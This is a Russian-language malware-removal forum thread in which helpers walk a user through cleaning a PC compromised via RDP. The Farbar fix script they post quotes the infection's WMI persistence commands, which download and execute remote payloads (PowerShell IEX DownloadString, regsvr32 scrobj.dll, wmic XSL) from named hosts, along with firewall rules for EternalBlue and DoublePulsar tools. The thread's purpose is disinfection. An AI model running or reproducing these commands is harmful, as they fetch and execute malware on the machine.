Перейти к содержанию

кто-то установил RDP на пк


Рекомендуемые сообщения

Здравствуйте!

 

Проблему опишите, пожалуйста, подробнее, в чем именно выражается.

 

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям.
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

Ссылка на сообщение
Поделиться на другие сайты

Заметил на диске С: папку "левую" (уже удалилась после AV block remover) там, что-то про rdp было. Посмотрел в администрировании в пользователях пользователь новый, его удалил. Попытался касперского установить free  - не устанавливается. Поэтому решил к профессионалам обратиться.

CollectionLog-2021.10.04-14.32.zip AV_block_remove.log

Ссылка на сообщение
Поделиться на другие сайты

Теперь понятно :)

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

 

Файл

Цитата

C:\Users\MLP\desktop\aa_v3.exe

вам известен? Это тоже программа удалённого управления AmmyAdmin.

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {1a17073d-48c6-11e6-bdd0-364b50b7ef2d} - E:\SISetup.exe
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {83d7d827-00ff-11e9-8be5-364b50b7ef2d} - E:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {d0bcfb0f-2905-11e6-b90f-d8cb8ae0fe7d} - "I:\Install MegaFon Internet.exe"
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\kz.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass2.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\olly.exe
    2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\script.exe
    2021-01-04 10:43 C:\Program Files (x86)\Zaxar
    2021-01-04 10:43 C:\Windows\boy.exe
    2021-01-04 10:43 C:\Windows\java.exe
    2021-01-04 10:43 C:\Windows\svchost.exe
    2021-01-04 10:43 C:\Windows\SysWOW64\Drivers\conhost.exe
    2021-01-04 10:43 C:\ProgramData\Driver Foundation Visions VHG
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"topx4\"",Filter="__EventFilter.Name=\"topx3\"::
    WMI:subscription\__EventFilter->topx3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 11000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
    WMI:subscription\CommandLineEventConsumer->topx4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.dasxost.com:8080/power.txt')||regsvr32 /u /s /i:http://185.26.115.40:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://185.26.115.144:8220/s.xsl"]
    WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
    FirewallRules: [{24F5AB21-FD6B-4800-88E4-AF6A887D4F97}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
    FirewallRules: [{0CC96BE1-E966-4ADE-B25B-80542EBADB5E}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
    FirewallRules: [{31732C49-DC53-4085-B207-84E186F421FE}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
    FirewallRules: [{2DAAC257-3DF8-4919-BAED-196D7A532C9A}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
    FirewallRules: [{7BDFDB76-754B-4D35-93DD-B98F12A34D38}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
    FirewallRules: [{45C49E5A-2858-41B4-81B0-A089019CB5D4}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
    FirewallRules: [{68DC5587-D66F-4512-B002-9788A6A41F00}] => (Allow) C:\ProgramData\RealtekHD\taskhostw.exe => Нет файла
    FirewallRules: [{E57F64A7-AA55-4488-A5D8-ECDB4003D773}] => (Allow) C:\ProgramData\rundll\system.exe => Нет файла
    FirewallRules: [{A9AD11A1-29A5-4A5C-91EA-F4527C1C8D63}] => (Allow) C:\ProgramData\rundll\rundll.exe => Нет файла
    FirewallRules: [{D90D92D7-4D88-4B2B-A141-916A875E0B54}] => (Allow) C:\ProgramData\rundll\Doublepulsar-1.3.1.exe => Нет файла
    FirewallRules: [{C583528B-9C13-45EA-A6AD-EC7613BD082B}] => (Allow) C:\ProgramData\rundll\Eternalblue-2.2.0.exe => Нет файла
    FirewallRules: [{16B70809-10D7-48CB-A52D-01D477548D3E}] => (Allow) LPort=9494
    FirewallRules: [{23908275-A1BE-41BE-8688-7D75BC4550F5}] => (Allow) LPort=9393
    FirewallRules: [{1339B6CC-2275-4060-9113-2C024E11A1E8}] => (Allow) LPort=9494
    FirewallRules: [{5FED84C7-E9C8-42EF-94DC-60E9BE8AE912}] => (Allow) LPort=9393
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Если проблема решена, в завершение:

 

1. Выполните процедуру, описанную на этой странице.
Ссылку на результат анализа приведите здесь, пожалуйста.

 

2.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

3.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
Дата установки обновлений: 2018-04-30 09:14:55
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
Total Commander v.8.51 Внимание! Скачать обновления
WinRAR 5.31 (64-разрядная) v.5.31.0 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Google Chrome v.94.0.4606.61 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Google Chrome!^
Opera Stable 65.0.3467.78 v.65.0.3467.78 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera Stable 79.0.4143.50 v.79.0.4143.50 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
 

Особенно обратите внимание на Контроль учетных записей и постарайтесь установить все хотфиксы. Иначе рискуете снова заразиться.

 

Читайте Рекомендации после удаления вредоносного ПО

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • DIMANDUC
      От DIMANDUC
      Не работает подключение по rdp, что делать? Ошибка содержит "1) не включен удаленный доступ к серверу 2) удаленный компьютер выключен 3)удаленный компьютер не подключен к сети".
    • maximl
      От maximl
      Добрый день. Прошу помощи в расшифровке файлов. Логи прилагаю. Заранее спасибо.
      Addition.txt Files.zip FRST.txt virus.zip
    • westoff
      От westoff
      Всем привет.
      После прихода обновы kb4577671 на 1909 началась какая то странность с rdp.
      Подключаемся, видим рабочий стол, ярлыки, и сам стол активен- можно взаимодействовать, но трей, панель задач, пуск напрочь висят. 
       
      Минут через 7 всё оживает.
       
      Вход пользователя настроен так
      Если вернуть по умолчанию, то трей и панель задач прогрузятся сразу, но всё равно 10 минут будет не активен пуск.
       
      Винда давно уже обновилась до 20h2
      Всё без изменений.
      Пробовал чистую винду поставить- баг воспроизводится.
      Подобное поведение под всеми пользователями.
      Бывает, что при смене пользователя непосредственно на пк это так же воспроизводится. Но не всегда.
      Есть у кого идеи как лечить?
    • MaxSpirit
      От MaxSpirit
      друзья помогите советом или рецептом, поймали шифровальщика fairexchange@qq.com все файлы зашифрованы, что с этим можно сделать? на сайтах касперского и доктораВэба ответов не нахожу,  в сети тоже не густо. 
    • serznamens
      От serznamens
      Добрый день, в систему залетел вирус удаленного доступа. RogueKiller ругается на TermService и RemoteRegistery. Установились пять драйверов скрин приложен.
      CollectionLog-2019.11.10-12.09.zip

×
×
  • Создать...